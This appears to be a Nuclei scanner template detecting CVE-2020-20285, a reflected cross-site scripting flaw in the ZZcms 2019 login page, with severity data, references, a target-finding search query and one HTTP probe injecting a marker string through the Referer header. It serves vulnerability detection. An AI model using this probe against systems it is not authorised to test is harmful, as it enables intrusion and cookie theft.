id: CVE-2020-20285 info: name: ZZcms - Cross-Site Scripting author: edoardottt severity: medium description: | ZZcms 2019 contains a cross-site scripting vulnerability in the user login page. An attacker can inject arbitrary JavaScript code in the referer header via user/login.php, which can allow theft of cookie-based credentials and launch of subsequent attacks. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: - https://github.com/iohex/ZZCMS/blob/master/zzcms2019_login_xss.md - https://nvd.nist.gov/vuln/detail/CVE-2020-20285 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2020-20285 cwe-id: CWE-79 epss-score: 0.0009 epss-percentile: 0.37784 cpe: cpe:2.3:a:zzcms:zzcms:2019:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: zzcms product: zzcms fofa-query: zzcms tags: cve,cve2020,zzcms,xss http: - raw: - | GET /user/login.php HTTP/1.1 Host: {{Hostname}} Referer: xss"/> matchers-condition: and matchers: - type: word part: body words: - 'fromurl" type="hidden" value="xss"/>' - type: word part: header words: - "text/html" - type: status status: - 200 # digest: 4b0a00483046022100e9b4078315bf229572a57e5f370c11cedf80c7221d1d8b7811192b0a4eaf4cb3022100c3cbb5f378de01c89cd050cc865ba715135bce31ae32e457d62ed4a0288b77d3:922c64590222798bb761d5b6d8e72950